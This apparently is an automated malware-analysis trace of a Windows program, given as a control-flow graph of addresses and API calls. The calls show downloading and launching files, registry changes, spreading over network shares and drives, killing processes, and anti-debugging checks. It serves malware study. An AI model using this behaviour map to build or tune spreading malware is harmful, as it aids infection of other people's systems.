8360->8311 8361->8332 8362->8338 8363->8035 8364->8040 8365->8044 8366->8049 8367->8051 8368->8056 8369->8056 8370->8057 8371->8036 8372->8039 8373->8043 8374->8042 8375->8059 8376->8064 8377->8064 8378->8073 8379->8073 8380->8083 8381->8087 8382->8087 8383->8095 8384->8095 8386 143d1f4 8385->8386 8387 143d346 8386->8387 8388 143d20e 8386->8388 8410 14344cb InterlockedExchange 8386->8410 8387->8101 8411 14344cb InterlockedExchange 8388->8411 8391 143d273 8393 143c76b 2 API calls 8391->8393 8395 143d298 8391->8395 8392 143d232 8392->8391 8412 14344cb InterlockedExchange 8392->8412 8393->8395 8396 143b3ef InterlockedExchange 8395->8396 8397 143d336 8396->8397 8397->8101 8398->8110 8399->8110 8400->8115 8401->8115 8402->8135 8403->8135 8404->8145 8405->8145 8406->8166 8407->8166 8408->8183 8409->8183 8410->8388 8411->8392 8412->8391 8413->7509 8415 143a7a9 lstrcat 8414->8415 8416 143a7b8 8414->8416 8415->8416 8466 143a16b 8416->8466 8418 143a7c4 lstrcpy 8471 14344cb InterlockedExchange 8418->8471 8420 143a7da 8421 143a814 lstrlen wsprintfA 8420->8421 8422 143a7ec lstrlen wsprintfA 8420->8422 8423 143a83b 8421->8423 8422->8423 8423->7513 8474 143a677 8424->8474 8427 1440b8f 8427->7513 8428 1440a0a InternetOpenA 8429 1440a31 InternetOpenUrlA 8428->8429 8430 1440b63 8428->8430 8429->8430 8431 1440a63 8429->8431 8432 1440b6c InternetCloseHandle 8430->8432 8433 1440b79 8430->8433 8434 1440a69 CreateFileA 8431->8434 8435 1440a8b InternetReadFile 8431->8435 8432->8433 8433->8427 8436 1440b82 InternetCloseHandle 8433->8436 8434->8435 8440 1440ab3 8435->8440 8436->8427 8437 1440b56 CloseHandle 8437->8430 8438 1440acf WriteFile 8438->8440 8439 1440b15 8439->8437 8440->8435 8440->8437 8440->8438 8440->8439 8442 1441536 GlobalAlloc ReadFile lstrlen 8441->8442 8443 144152f 8441->8443 8444 1441587 8442->8444 8443->7513 8445 1441730 8444->8445 8446 144159d lstrlen 8444->8446 8445->8443 8447 1441736 GlobalFree 8445->8447 8448 14415c4 8446->8448 8447->8443 8448->8445 8449 1441641 
SetFilePointer WriteFile SetFilePointer SetEndOfFile CloseHandle 8448->8449 8450 14415fe lstrlen 8448->8450 8451 14416c4 8449->8451 8452 14416b8 8449->8452 8450->8448 8454 14416d4 DeleteFileA 8451->8454 8455 14416ca GlobalFree 8451->8455 8452->8451 8453 14416e5 8452->8453 8456 1434631 3 API calls 8453->8456 8454->8443 8455->8454 8457 14416ee Sleep CreateThread 8456->8457 8458 14341c6 3 API calls 8457->8458 8486 143a1f2 lstrcpy 8457->8486 8459 1441722 Sleep 8458->8459 8459->8445 8461 143460b WriteFile CloseHandle 8460->8461 8462 143462d 8460->8462 8461->8462 8462->7521 8464 143470c CreateProcessA 8463->8464 8464->7524 8472 14344cb InterlockedExchange 8466->8472 8468 143a1dd lstrcpy 8468->8418 8470 143a192 8470->8468 8473 14344cb InterlockedExchange 8470->8473 8471->8420 8472->8470 8473->8470 8476 143a68a 8474->8476 8475 143a757 8475->8427 8475->8428 8476->8475 8477 143a6b0 8476->8477 8478 143a6c5 GetTickCount 8477->8478 8479 143a70f GetTickCount 8477->8479 8484 14344cb InterlockedExchange 8478->8484 8485 14344cb InterlockedExchange 8479->8485 8482 143a6d2 GetTickCount lstrlen wsprintfA 8482->8475 8483 143a71c GetTickCount lstrlen wsprintfA 8483->8475 8484->8482 8485->8483 8487 143a226 8486->8487 8488 143a22f GetFileAttributesA 8487->8488 8489 143a25d RtlExitUserThread 8487->8489 8490 143a243 DeleteFileA Sleep 8488->8490 8491 143a241 8488->8491 8490->8487 8491->8489 8493 1448060 8492->8493 8494 1443787 GlobalAlloc 8493->8494 8495 144381f 8494->8495 8540 1442fff 8495->8540 8497 143e329 48 API calls 8498 144382e 8497->8498 8498->8497 8499 144384d Sleep 8498->8499 8500 144385a 8498->8500 8499->8498 8502 14438a2 8500->8502 8545 14344cb InterlockedExchange 8500->8545 8502->7536 8504 144192e 8503->8504 8510 1441828 8503->8510 8504->7548 8505 1441843 RegEnumValueA 8506 144191a RegCloseKey 8505->8506 8505->8510 8506->8504 8508 14418bd lstrlen lstrlen 8508->8510 8509 143e329 48 API calls 8511 144190a Sleep 8509->8511 8510->8505 8510->8508 8510->8509 8511->8510 8513 1441a42 
GlobalAlloc 8512->8513 8515 1441a26 8512->8515 8520 1441a5a 8513->8520 8514 1441c9d GlobalFree WNetCloseEnum 8514->8515 8515->7550 8516 1441a79 WNetEnumResourceA 8517 1441c7e GetLastError 8516->8517 8516->8520 8518 1441c8d Sleep 8517->8518 8519 1441c8b 8517->8519 8518->8520 8519->8514 8520->8514 8520->8516 8520->8518 8521 1441acf 8520->8521 8522 1441c77 8521->8522 8523 1441b14 lstrcpy lstrcat 8521->8523 8524 1441c51 8521->8524 8522->7550 8526 1440b9a 7 API calls 8523->8526 8525 144195d 103 API calls 8524->8525 8527 1441c69 Sleep 8525->8527 8528 1441b47 8526->8528 8527->8522 8528->8524 8529 1441b6b lstrcpy lstrlen 8528->8529 8533 1441be3 8528->8533 8530 1441b96 lstrcat 8529->8530 8531 1441ba8 lstrlen 8529->8531 8530->8531 8532 143a16b 2 API calls 8531->8532 8535 1441bc2 lstrcat 8532->8535 8536 1441c0f lstrlen 8533->8536 8539 1441c38 8533->8539 8534 1441c44 DeleteFileA 8534->8524 8546 1440c4b 8535->8546 8552 1441060 Sleep 8536->8552 8539->8524 8539->8534 8541 143a75a 10 API calls 8540->8541 8542 1443015 CreateFileA 8541->8542 8543 144305e 8542->8543 8544 144303a WriteFile CloseHandle 8542->8544 8543->8498 8544->8543 8545->8500 8547 1440c6a lstrlen 8546->8547 8548 1440c8d CreateFileA 8547->8548 8549 1440c61 8547->8549 8550 1440c87 8548->8550 8551 1440caf WriteFile CloseHandle GetFileAttributesA 8548->8551 8549->8547 8549->8550 8550->8533 8551->8550 8553 14410d4 lstrcat 8552->8553 8554 14410ec 8552->8554 8553->8554 8555 1441117 lstrcat FindFirstFileA 8554->8555 8556 1441101 8554->8556 8557 1441141 FindNextFileA 8555->8557 8558 1441170 8555->8558 8556->8539 8557->8558 8573 1441157 8557->8573 8559 1441492 8558->8559 8564 144146f 8558->8564 8560 14414b1 FindClose 8559->8560 8561 14414bb Sleep 8559->8561 8560->8561 8561->8556 8562 144119f lstrlen 8566 14411c7 lstrcat lstrlen lstrlen 8562->8566 8562->8573 8563 144117b Sleep 8563->8562 8592 1440e71 8564->8592 8568 1441207 lstrcmpiA 8566->8568 8566->8573 8569 144121e lstrcmpiA 8568->8569 8568->8573 8569->8573 8570 14413aa 
lstrcpy lstrlen lstrcmpiA 8570->8573 8571 143e329 48 API calls 8571->8573 8572 1441060 71 API calls 8572->8573 8573->8557 8573->8558 8573->8562 8573->8563 8573->8570 8573->8571 8573->8572 8576 1441277 8573->8576 8578 14412f2 lstrcpy lstrcat 8573->8578 8574 143a26e 48 API calls 8574->8576 8576->8573 8576->8574 8577 144136a DeleteFileA 8576->8577 8579 1440cf6 CreateFileA 8576->8579 8577->8576 8578->8573 8580 1440d45 GetFileSize 8579->8580 8581 1440e6a 8579->8581 8582 1440e60 CloseHandle 8580->8582 8583 1440d61 GlobalAlloc ReadFile 8580->8583 8581->8576 8582->8581 8584 1440da1 8583->8584 8585 1440e56 GlobalFree 8584->8585 8586 1440dac CreateFileW 8584->8586 8585->8582 8586->8585 8587 1440ddb GetFileSize 8586->8587 8588 1440df3 GlobalAlloc ReadFile 8587->8588 8589 1440e4c CloseHandle 8587->8589 8590 1440e34 8588->8590 8589->8585 8591 1440e42 GlobalFree 8590->8591 8591->8589 8593 1448060 8592->8593 8594 1440e7e lstrcpy 8593->8594 8595 1440f03 8594->8595 8596 1440f1a lstrlen 8594->8596 8611 14344cb InterlockedExchange 8595->8611 8598 143a16b 2 API calls 8596->8598 8599 1440f34 lstrcat 8598->8599 8601 1440f76 MultiByteToWideChar CreateFileA 8599->8601 8600 1440f08 8600->8596 8602 1440f4b 8600->8602 8604 1441055 8601->8604 8605 1440fc1 lstrlenW 8601->8605 8612 14344cb InterlockedExchange 8602->8612 8604->8559 8607 144772b 8605->8607 8606 1440f50 lstrcat 8606->8601 8608 1440ff1 lstrlenW 8607->8608 8609 144772b 8608->8609 8610 1441017 WriteFile CloseHandle 8609->8610 8610->8604 8611->8600 8612->8606 8614 1448060 8613->8614 8615 1441cf0 lstrcpy GetDriveTypeA 8614->8615 8616 1441d60 8615->8616 8617 1441d7e RtlExitUserThread 8615->8617 8618 1441060 91 API calls 8616->8618 8619 1441d7b 8618->8619 8619->8617 8621 1441ea9 8620->8621 8622 1441ee8 RtlExitUserThread 8621->8622 8665 1441d8f RegOpenKeyExA 8621->8665 8624 1441ebe Sleep 8625 1441d8f 53 API calls 8624->8625 8626 1441ed8 Sleep 8625->8626 8626->8621 8628 144308c 8627->8628 8674 14344cb InterlockedExchange 8628->8674 8630 
1443162 Sleep 8631 1442fff 13 API calls 8630->8631 8633 1443188 8631->8633 8632 143e329 48 API calls 8632->8633 8633->8632 8634 14431a7 Sleep 8633->8634 8639 14431b4 8633->8639 8634->8633 8635 1443744 RtlExitUserThread 8637 1442ebc 11 API calls 8638 144320b Sleep GetLogicalDrives 8637->8638 8638->8639 8639->8635 8639->8637 8640 1443734 Sleep 8639->8640 8641 1443278 GetDriveTypeA 8639->8641 8640->8639 8641->8639 8642 14432bc lstrcat CreateFileA 8641->8642 8643 1443522 GetFileAttributesA 8642->8643 8644 14432ff GetFileTime FileTimeToSystemTime 8642->8644 8646 144353e SetFileAttributesA DeleteFileA 8643->8646 8647 1443569 CreateFileA 8643->8647 8645 1443515 CloseHandle 8644->8645 8662 144333d 8644->8662 8645->8643 8712 143a2ad SHFileOperation RemoveDirectoryA 8646->8712 8647->8639 8648 1443598 GetSystemTime SystemTimeToFileTime 8647->8648 8650 143a16b 2 API calls 8648->8650 8655 1443605 8650->8655 8651 1443566 8651->8647 8652 1443372 ReadFile CharLowerA lstrlen 8654 1443509 8652->8654 8652->8662 8654->8645 8656 1443633 lstrcat 8655->8656 8657 144361f lstrcat 8655->8657 8675 14344cb InterlockedExchange 8655->8675 8676 1442b8e 8655->8676 8656->8655 8657->8655 8659 1443658 6 API calls 8659->8639 8660 14436ef WriteFile CloseHandle SetFileAttributesA 8659->8660 8660->8639 8661 1443465 lstrcpy GetFileAttributesA 8661->8654 8663 1443491 CloseHandle CreateFileA 8661->8663 8662->8645 8662->8652 8662->8654 8662->8661 8663->8654 8664 14434c9 WriteFile CloseHandle SetFileAttributesA 8663->8664 8664->8654 8666 1441de5 RegEnumValueA 8665->8666 8667 1441e89 RegCloseKey 8665->8667 8668 1441e34 8666->8668 8669 1441e29 8666->8669 8667->8624 8668->8667 8669->8668 8670 1441e36 GetFileAttributesA 8669->8670 8673 1441e48 8670->8673 8671 143e329 48 API calls 8671->8673 8672 1441e5f Sleep 8672->8666 8672->8667 8673->8671 8673->8672 8674->8630 8675->8655 8677 1442c23 8676->8677 8713 14344cb InterlockedExchange 8677->8713 8679 1442c2b 8680 1442c49 lstrcat 8679->8680 8714 1442a35 lstrlen 
8679->8714 8735 14344cb InterlockedExchange 8680->8735 8683 1442c5e 8685 1442c79 8683->8685 8686 1442a35 10 API calls 8683->8686 8684 1442c46 8684->8680 8687 1442e04 8685->8687 8688 1442ca4 8685->8688 8686->8685 8744 14344cb InterlockedExchange 8687->8744 8736 14344cb InterlockedExchange 8688->8736 8691 1442e09 8692 1442e24 8691->8692 8693 1442a35 10 API calls 8691->8693 8692->8659 8693->8692 8694 1442dff 8694->8659 8695 1442ca9 8695->8694 8737 14344cb InterlockedExchange 8695->8737 8697 1442cf4 8698 1442d12 lstrcpy 8697->8698 8699 1442a35 10 API calls 8697->8699 8738 1442962 8698->8738 8701 1442d0f 8699->8701 8701->8698 8702 1442d44 8703 1442dee lstrcat 8702->8703 8742 14344cb InterlockedExchange 8702->8742 8703->8694 8705 1442d68 8706 1442d8c lstrcat 8705->8706 8707 1442d7a lstrcat 8705->8707 8743 14344cb InterlockedExchange 8706->8743 8707->8706 8709 1442da3 8710 1442db5 lstrcat 8709->8710 8711 1442dc7 lstrlen wsprintfA 8709->8711 8710->8711 8711->8703 8712->8651 8713->8679 8745 14344cb InterlockedExchange 8714->8745 8716 1442a61 8717 1442a82 8716->8717 8718 1442a73 lstrcat 8716->8718 8746 14344cb InterlockedExchange 8717->8746 8718->8717 8720 1442a87 8721 1442aa8 lstrcat 8720->8721 8722 1442a99 lstrcat 8720->8722 8747 14344cb InterlockedExchange 8721->8747 8722->8721 8724 1442abc 8748 14344cb InterlockedExchange 8724->8748 8726 1442b6e 8727 1442962 InterlockedExchange 8726->8727 8728 1442b77 lstrcat 8727->8728 8728->8684 8729 1442b08 lstrlen 8730 143a16b 2 API calls 8729->8730 8732 1442aca 8730->8732 8731 14344cb InterlockedExchange 8731->8732 8732->8726 8732->8729 8732->8731 8733 1442b37 lstrcat 8732->8733 8734 1442b5d lstrcat 8732->8734 8733->8732 8734->8732 8735->8683 8736->8695 8737->8697 8741 1442976 8738->8741 8739 1442a31 8739->8702 8740 14344cb InterlockedExchange 8740->8741 8741->8739 8741->8740 8742->8705 8743->8709 8744->8691 8745->8716 8746->8720 8747->8724 8748->8732 8750 14390b5 8749->8750 8752 1438fae 8749->8752 8750->7558 8751 1438fbc 
RegEnumValueA 8751->8752 8758 1438ff3 8751->8758 8752->8751 8753 1438ff5 RegDeleteValueA 8752->8753 8752->8758 8753->8751 8754 143901d RegEnumKeyExA 8755 14390ab RegCloseKey 8754->8755 8754->8758 8755->8750 8756 1439052 wsprintfA 8756->8758 8757 1439050 8757->8755 8758->8754 8758->8756 8758->8757 8759 1439084 RegDeleteKeyA 8758->8759 8759->8754 8761 1439342 lstrcat 8760->8761 8762 1439354 lstrcat lstrcat 8760->8762 8761->8762 8763 143938a 8762->8763 8763->7579 8765 14391b5 CloseHandle 8764->8765 8766 14391ae 8764->8766 8765->7585 8766->8765 8769 1439258 8767->8769 8768 14392d9 SetFileAttributesA DeleteFileA 8768->7586 8769->8768 8771 14397a0 8770->8771 8772 143978e lstrcat 8770->8772 8773 14397c4 GlobalAlloc 8771->8773 8775 14397f6 8771->8775 8772->8771 8774 14397f1 8773->8774 8774->8775 8776 1439805 lstrcat 8774->8776 8775->7561 8775->7594 8777 143a75a 10 API calls 8776->8777 8778 143984d CopyFileA 8777->8778 8779 1439881 8778->8779 8780 143986a LoadLibraryExA 8778->8780 8781 14398b1 GlobalFree GetProcAddress 8779->8781 8782 143988a LoadLibraryExA 8779->8782 8780->8779 8781->8775 8783 14398e7 8781->8783 8782->8775 8782->8781 8783->8775 8784 1439997 GlobalAlloc 8783->8784 8785 14399d1 CreateFileA 8784->8785 8785->8775 8787 1439a62 WriteFile CloseHandle GlobalFree FreeLibrary 8785->8787 8787->8775 8788 1439ab8 DeleteFileA 8787->8788 8788->8775 8790 1439ec1 8789->8790 8791 1439edc RtlExitUserThread 8790->8791 8802 1439c4f CreateToolhelp32Snapshot 8790->8802 8793 1439ecf Sleep 8793->8790 8800 143944d 8794->8800 8795 14394c7 RtlExitUserThread 8796 1439459 Sleep 8796->8800 8797 14394ba Sleep 8797->8800 8798 143948a lstrlen 8798->8797 8798->8800 8800->8795 8800->8796 8800->8797 8800->8798 8801 143946d Sleep 8800->8801 8801->8800 8803 1439eac CloseHandle 8802->8803 8804 1439cac Process32First 8802->8804 8803->8793 8805 1439cea CharUpperA 8804->8805 8806 1439db8 Process32Next 8804->8806 8812 1439d03 8805->8812 8806->8803 8807 1439dd3 CharUpperA 8806->8807 8819 1439df2 
8807->8819 8808 1439d71 8808->8806 8827 1439b56 CreateToolhelp32Snapshot Module32First 8808->8827 8809 1439b56 5 API calls 8809->8819 8811 1439d8b 8811->8806 8815 1439acf 6 API calls 8811->8815 8812->8808 8822 1439acf CreateFileA 8812->8822 8814 1439acf 6 API calls 8817 1439e11 Sleep 8814->8817 8818 1439d9e Sleep 8815->8818 8817->8806 8818->8806 8819->8806 8819->8809 8819->8814 8820 1439acf 6 API calls 8819->8820 8821 1439e89 Sleep 8820->8821 8821->8819 8823 1439b32 WriteFile CloseHandle 8822->8823 8824 1439b00 OpenProcess 8822->8824 8825 1439b30 Sleep 8823->8825 8824->8825 8826 1439b1a TerminateProcess CloseHandle 8824->8826 8825->8808 8826->8825 8828 1439c37 CloseHandle 8827->8828 8831 1439bce 8827->8831 8828->8811 8829 1439c20 Module32Next 8829->8828 8829->8831 8830 1439bd7 CharUpperA 8830->8831 8831->8829 8831->8830 8832 1439c14 8831->8832 8832->8828 9328 14414a1 9329 14414ab 9328->9329 9330 14414b1 FindClose 9329->9330 9331 14414bb Sleep 9329->9331 9330->9331 9332 14414c8 9331->9332 9333 14424a1 9334 14424ab 9333->9334 9335 14424b4 CloseHandle 9334->9335 9336 14424cb 9334->9336 9335->9336 9337 14424d4 CloseHandle 9336->9337 9338 14424e1 9336->9338 9337->9338 9339 1442500 9338->9339 9340 14424ea GetProcessHeap HeapFree 9338->9340 9340->9339 8833 ab130d 8854 ab1000 8833->8854 8836 ab1495 8840 ab157d GetPEB VirtualAlloc VirtualFree 8848 ab132c 8840->8848 8843 ab157d 3 API calls 8845 ab1441 EnumWindows 8843->8845 8844 ab13dc CheckRemoteDebuggerPresent 8844->8848 8913 ab61cf 8845->8913 8979 ab1081 8845->8979 8848->8840 8848->8843 8851 ab157d 3 API calls 8848->8851 8877 ab5870 8848->8877 8886 ab1139 8848->8886 8891 ab157d 8848->8891 8902 ab11d6 8848->8902 8849 ab157d 3 API calls 8850 ab1463 Sleep 8849->8850 8850->8848 8852 ab1402 Sleep 8851->8852 8853 ab157d 3 API calls 8852->8853 8853->8848 8917 ab29e2 8854->8917 8859 ab157d 3 API calls 8860 ab1023 8859->8860 8862 ab103c 8860->8862 8923 ab62a1 8860->8923 8935 ab538c 8862->8935 8865 ab538c 3 API calls 8866 ab1071 
8865->8866 8867 ab538c 3 API calls 8866->8867 8868 ab1077 8867->8868 8868->8836 8869 ab12b2 8868->8869 8870 ab5307 4 API calls 8869->8870 8871 ab12bd 8870->8871 8950 ab149b 8871->8950 8873 ab538c 3 API calls 8874 ab1308 8873->8874 8874->8848 8875 ab12c5 8875->8873 8876 ab12e6 8875->8876 8876->8848 8878 ab157d 3 API calls 8877->8878 8879 ab5889 CreateToolhelp32Snapshot 8878->8879 8880 ab589b 8879->8880 8885 ab5897 8879->8885 8881 ab157d 3 API calls 8880->8881 8883 ab58da 8880->8883 8882 ab58ca Process32FirstW 8881->8882 8882->8880 8882->8883 8953 ab2371 8883->8953 8885->8848 8888 ab11a5 8886->8888 8887 ab157d 3 API calls 8887->8888 8888->8887 8890 ab11cb 8888->8890 8956 ab58eb 8888->8956 8890->8848 8892 ab1d45 8891->8892 8893 ab1d56 8891->8893 8895 ab1d58 8892->8895 8896 ab1d4c 8892->8896 8894 ab538c 3 API calls 8893->8894 8900 ab1dba 8894->8900 8965 ab1e6e 8895->8965 8968 ab14ba GetPEB 8896->8968 8900->8844 8903 ab11e3 8902->8903 8904 ab157d 3 API calls 8903->8904 8905 ab122d QueryDosDeviceW 8904->8905 8906 ab12a9 8905->8906 8907 ab1243 8905->8907 8906->8848 8908 ab5307 4 API calls 8907->8908 8912 ab124e 8908->8912 8909 ab12a1 8910 ab538c 3 API calls 8909->8910 8910->8906 8911 ab157d 3 API calls 8911->8912 8912->8909 8912->8911 8914 ab61d5 8913->8914 8973 ab6111 8914->8973 8940 ab1e4d 8917->8940 8920 ab2bd5 8921 ab1e4d 3 API calls 8920->8921 8922 ab1015 8921->8922 8922->8859 8924 ab157d 3 API calls 8923->8924 8925 ab62ca RegQueryValueExW 8924->8925 8926 ab6319 8925->8926 8927 ab62df 8925->8927 8929 ab157d 3 API calls 8926->8929 8947 ab5307 8927->8947 8931 ab6328 RegCloseKey 8929->8931 8930 ab62e9 8932 ab157d 3 API calls 8930->8932 8931->8862 8933 ab62f9 8932->8933 8933->8926 8934 ab538c 3 API calls 8933->8934 8934->8926 8936 ab106b 8935->8936 8937 ab5395 8935->8937 8936->8865 8938 ab157d 2 API calls 8937->8938 8939 ab53a1 VirtualFree 8938->8939 8939->8936 8943 ab5353 8940->8943 8942 ab100e 8942->8920 8944 ab157d 2 API calls 8943->8944 8945 ab5363 VirtualAlloc 
8944->8945 8946 ab537a 8945->8946 8946->8942 8948 ab157d 3 API calls 8947->8948 8949 ab5316 VirtualAlloc 8948->8949 8949->8930 8951 ab157d 3 API calls 8950->8951 8952 ab14aa 8951->8952 8952->8875 8954 ab157d 3 API calls 8953->8954 8955 ab2380 CloseHandle 8954->8955 8955->8885 8957 ab157d 3 API calls 8956->8957 8958 ab5904 CreateToolhelp32Snapshot 8957->8958 8963 ab5914 8958->8963 8964 ab5918 8958->8964 8959 ab157d 3 API calls 8960 ab5947 Module32FirstW 8959->8960 8961 ab5957 8960->8961 8960->8964 8962 ab2371 4 API calls 8961->8962 8962->8963 8963->8888 8964->8959 8964->8961 8966 ab5353 3 API calls 8965->8966 8967 ab1da8 8966->8967 8970 ab14fc 8967->8970 8969 ab14cd 8968->8969 8969->8893 8971 ab14ba GetPEB 8970->8971 8972 ab150d 8971->8972 8972->8893 8974 ab611e 8973->8974 8975 ab1459 8973->8975 8976 ab157d 3 API calls 8974->8976 8977 ab157d 3 API calls 8974->8977 8975->8849 8976->8974 8978 ab6141 Sleep 8977->8978 8978->8974 8978->8975 8980 ab5307 4 API calls 8979->8980 8981 ab10df 8980->8981 8982 ab157d 3 API calls 8981->8982 8986 ab10ed 8982->8986 8983 ab112a 8984 ab538c 3 API calls 8983->8984 8985 ab1131 8984->8985 8986->8983 8987 ab157d 3 API calls 8986->8987 8987->8986 9237 143d1e4 9238 143d1f4 9237->9238 9239 143d346 9238->9239 9240 143d20e 9238->9240 9250 14344cb InterlockedExchange 9238->9250 9251 14344cb InterlockedExchange 9240->9251 9243 143d273 9245 143c76b 2 API calls 9243->9245 9247 143d298 9243->9247 9244 143d232 9244->9243 9252 14344cb InterlockedExchange 9244->9252 9245->9247 9248 143b3ef InterlockedExchange 9247->9248 9249 143d336 9248->9249 9250->9240 9251->9244 9252->9243 9035 1435a6a 9038 1435a82 9035->9038 9036 1435c01 9037 1435bf4 RegCloseKey 9037->9036 9039 1435ad0 wsprintfA RegQueryValueExA 9038->9039 9040 1435b37 9038->9040 9039->9040 9040->9036 9040->9037 9253 14358e9 9258 1435901 9253->9258 9254 1435c01 9255 1435bf4 RegCloseKey 9255->9254 9256 1435962 wsprintfA 9257 1435a01 RegSetValueExA 9256->9257 9256->9258 9257->9258 9258->9256 
9258->9257 9259 1435935 9258->9259 9259->9254 9259->9255 9041 14bd760 9042 14bd765 20 API calls 9041->9042 9260 14388f3 9261 143890a inet_addr 9260->9261 9264 1438906 9260->9264 9262 143892e gethostbyname 9261->9262 9263 143891d 9261->9263 9262->9264 9263->9262 9263->9264 9265 1438bf1 9273 1438a39 9265->9273 9266 1438da5 Sleep 9266->9273 9267 1438d8d Sleep 9267->9273 9268 1438cae lstrcpy 9268->9273 9269 1438db5 RtlExitUserThread 9270 1438bab Sleep 9270->9273 9272 143a75a 10 API calls 9272->9273 9273->9266 9273->9267 9273->9268 9273->9269 9273->9270 9273->9272 9274 1440945 18 API calls 9273->9274 9275 1438b2a IsBadWritePtr 9273->9275 9276 14414d9 28 API calls 9273->9276 9277 14345d2 4 API calls 9273->9277 9278 1434631 3 API calls 9273->9278 9274->9273 9275->9273 9276->9273 9277->9273 9279 1438b86 Sleep 9278->9279 9279->9273 9341 14344b1 9344 14344bb GetTickCount 9341->9344 9343 14344b9 9344->9343 9054 1434f36 9055 1434f45 9054->9055 9056 1434f52 wsprintfA 9055->9056 9057 1435085 RegCloseKey 9055->9057 9058 1434fa9 9056->9058 9059 1434f9c 9056->9059 9069 14350d2 9057->9069 9060 1435053 lstrlen RegSetValueExA 9058->9060 9061 1435030 RegSetValueExA 9058->9061 9059->9058 9062 1435007 9059->9062 9063 1434fe5 9059->9063 9067 1435215 9059->9067 9066 1435080 9060->9066 9061->9066 9065 1434a5b 2 API calls 9062->9065 9064 1434a5b 2 API calls 9063->9064 9070 1434ff4 lstrcpy 9064->9070 9068 1435016 lstrcpy 9065->9068 9068->9058 9071 14350f9 GlobalFree 9069->9071 9072 1435106 9069->9072 9070->9058 9071->9072 9345 1441ab1 9358 1441a5a 9345->9358 9346 1441c8d Sleep 9346->9358 9347 1441c77 9348 1441acf 9348->9347 9350 1441b14 lstrcpy lstrcat 9348->9350 9351 1441c51 9348->9351 9349 1441c9d GlobalFree WNetCloseEnum 9353 1441ccd 9349->9353 9354 1440b9a 7 API calls 9350->9354 9352 144195d 121 API calls 9351->9352 9355 1441c69 Sleep 9352->9355 9357 1441b47 9354->9357 9355->9347 9356 1441a79 WNetEnumResourceA 9356->9358 9359 1441c7e GetLastError 9356->9359 9357->9351 9360 1441b6b lstrcpy 
lstrlen 9357->9360 9366 1441be3 9357->9366 9358->9346 9358->9348 9358->9349 9358->9356 9359->9346 9361 1441c8b 9359->9361 9362 1441b96 lstrcat 9360->9362 9363 1441ba8 lstrlen 9360->9363 9361->9349 9362->9363 9365 143a16b 2 API calls 9363->9365 9364 1441c38 9364->9351 9367 1441c44 DeleteFileA 9364->9367 9368 1441bc2 lstrcat 9365->9368 9366->9364 9369 1441c0f lstrlen 9366->9369 9367->9351 9370 1440c4b 5 API calls 9368->9370 9371 1441060 91 API calls 9369->9371 9370->9366 9371->9364 9378 14390ba CreateFileA 9379 14390f2 9378->9379 9380 14390f4 WriteFile CloseHandle 9378->9380 9380->9379 9280 1434bf9 9281 1434c08 9280->9281 9282 1434c15 wsprintfA 9281->9282 9283 1434d68 RegCloseKey 9281->9283 9285 1434c60 9282->9285 9289 1434c6d 9282->9289 9284 1434d75 9283->9284 9288 1434ce5 9285->9288 9285->9289 9290 1434cbc 9285->9290 9286 1434d13 RegSetValueExA 9292 1434d63 9286->9292 9287 1434d36 lstrlen RegSetValueExA 9287->9292 9293 1434a5b 2 API calls 9288->9293 9289->9286 9289->9287 9291 1434a5b 2 API calls 9290->9291 9294 1434cd2 lstrcpy 9291->9294 9295 1434cf9 lstrcpy 9293->9295 9294->9289 9295->9289 9073 1443238 9089 14431f9 9073->9089 9074 1443734 Sleep 9074->9089 9075 1443278 GetDriveTypeA 9076 14432bc lstrcat CreateFileA 9075->9076 9075->9089 9079 1443522 GetFileAttributesA 9076->9079 9080 14432ff GetFileTime FileTimeToSystemTime 9076->9080 9077 1443744 RtlExitUserThread 9084 144353e SetFileAttributesA DeleteFileA 9079->9084 9085 1443569 CreateFileA 9079->9085 9082 1443515 CloseHandle 9080->9082 9099 144333d 9080->9099 9081 1442ebc 11 API calls 9083 144320b Sleep GetLogicalDrives 9081->9083 9082->9079 9083->9089 9102 143a2ad SHFileOperation RemoveDirectoryA 9084->9102 9086 1443598 GetSystemTime SystemTimeToFileTime 9085->9086 9085->9089 9088 143a16b 2 API calls 9086->9088 9094 1443605 9088->9094 9089->9074 9089->9075 9089->9077 9089->9081 9089->9085 9090 1443372 ReadFile CharLowerA lstrlen 9090->9099 9092 1443633 lstrcat 9092->9094 9093 144361f lstrcat 9093->9094 
9094->9092 9094->9093 9095 1442b8e 18 API calls 9094->9095 9103 14344cb InterlockedExchange 9094->9103 9096 1443658 6 API calls 9095->9096 9096->9089 9097 14436ef WriteFile CloseHandle SetFileAttributesA 9096->9097 9097->9089 9098 1443465 lstrcpy GetFileAttributesA 9098->9099 9100 1443491 CloseHandle CreateFileA 9098->9100 9099->9082 9099->9090 9099->9098 9100->9099 9101 14434c9 WriteFile CloseHandle SetFileAttributesA 9100->9101 9101->9099 9102->9089 9103->9094

Control-flow Graph

[control_flow_graph for the function beginning at 1443b60: basic-block edge list, not reproduced as text. It starts at block 1443b60-1443c26 (call 1448060, call 1442ebc, LoadLibraryA), continues through two LoadLibraryA/GetProcAddress resolution blocks, four RegOpenKeyExA/RegSetValueExA/RegCloseKey sequences (one of them with GetModuleFileNameA, wsprintfA and lstrlen in between), then GetWindowsDirectoryA, GetComputerNameA, GetUserNameA, GetTempPathA, CreateFileMappingA (followed by calls to 143477f, 1436274, 1435760, 1435c26, 143c89a, 1438701, 1434d96, 14355be, 143a553), GetTickCount/wsprintfA, GetSystemDirectoryA and two GlobalAlloc calls. The same calls are itemised under APIs below.]
APIs
  • Part of subcall function 01442EBC: RegOpenKeyExA.KERNEL32(80000001,0143244C,00000000,000F003F,?,?), ref: 01442F03
  • Part of subcall function 01442EBC: RegSetValueExA.KERNELBASE(?,01432488,00000000,00000004,00000002,00000004), ref: 01442F31
  • Part of subcall function 01442EBC: RegCloseKey.KERNEL32(?), ref: 01442F3E
  • Part of subcall function 01442EBC: lstrcpy.KERNEL32(00000000,01432550), ref: 01442F99
  • Part of subcall function 01442EBC: lstrcat.KERNEL32(00000000,01432548), ref: 01442FAC
• LoadLibraryA.KERNEL32(01432154), ref: 01443C13
• GetProcAddress.KERNEL32(00000000,0143278C), ref: 01443C36
• GetProcAddress.KERNEL32(00000000,014327A0), ref: 01443C4E
• GetProcAddress.KERNEL32(00000000,014327B0), ref: 01443C67
• LoadLibraryA.KERNEL32(01432894), ref: 01443C79
• GetProcAddress.KERNEL32(00000000,014328D8), ref: 01443C9C
• GetProcAddress.KERNEL32(00000000,014328B0), ref: 01443CB5
• GetProcAddress.KERNEL32(00000000,014328C4), ref: 01443CCD
• GetProcAddress.KERNEL32(00000000,014328A0), ref: 01443CE6
